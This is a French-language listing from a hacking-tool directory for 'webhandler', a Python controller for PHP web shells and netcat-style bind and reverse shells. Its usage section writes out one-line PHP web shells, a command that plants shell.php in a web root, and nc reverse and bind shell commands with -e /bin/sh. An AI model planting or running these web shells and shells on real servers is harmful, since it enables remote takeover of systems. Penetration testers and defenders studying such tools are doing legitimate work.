Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
webhandler — Simulateur Bash pour contrôler un serveur à l'aide de fonctions système PHP. | Kitploit
Outils/GitHubGitHub/lnxg33k/webhandler
Génération de PayloadsÉvasion IDS/IPSExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHublnxg33k/webhandler

webhandler

Simulateur Bash pour contrôler un serveur à l'aide de fonctions système PHP.

Voir le dépôt
10024il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WebHandler


Un gestionnaire pour les fonctions système PHP et aussi une alternative au gestionnaire 'netcat' My image

Informations


WebHandler essaie de simuler une invite 'bash Linux' pour gérer et traiter :

root@kitploit:~
- Fonctions d'exécution de programmes PHP _(par ex. `system`, `passthru`, `exec`, etc.)_
- Connexions Bind shell
- Connexions de shell de réserve

Une autre fonctionnalité est de falsifier le champ "User-Agent" dans l'en-tête HTTP. (--random-angent).

Il supporte également les proxys HTTP (--proxy http://<ip>:<port>)

  • WebHandler fonctionne pour les requêtes POST et GET :

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • WebHandler est un remplacement pour les connexions netcat.

    Un exemple de connexion bind shell (par ex. nc -lvvp 1234 -e /bin/sh)

    Normalement, l'utilisateur ferait :

    • netcat -l -p 1234
    • nc -lvvp 1234

    Un exemple de connexion inversée (par ex. nc 127.0.0.1 4321 -e /bin/sh)

    Normalement, l'utilisateur ferait :

    • netcat -l -p 4321
    • nc -lvvp 4321

Utilisation


  • --Exemple de fichier :

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • --url est un argument obligatoire lors de l'envoi de requêtes GET ou POST (par ex. une connexion bind shell 'basée sur PHP via le web') :

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • --listen est un argument obligatoire lors de l'attente d'une connexion (par ex. une connexion inversée 'brute') :

    • python webhandler.py --listen 1234

Dépendances


Si la version de votre Python est < 2.7.x, alors argparse est requis Pour l'installer, exécutez : sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse OU sudo pip --install argparse.

readline est optionnel. Ce module est utilisé pour fournir des fonctionnalités avancées d'édition de ligne et d'historique.

git est optionnel. Cela permet de maintenir le projet à jour.

Liens


Wiki

[Bugs connus][]

Télécharger l’outil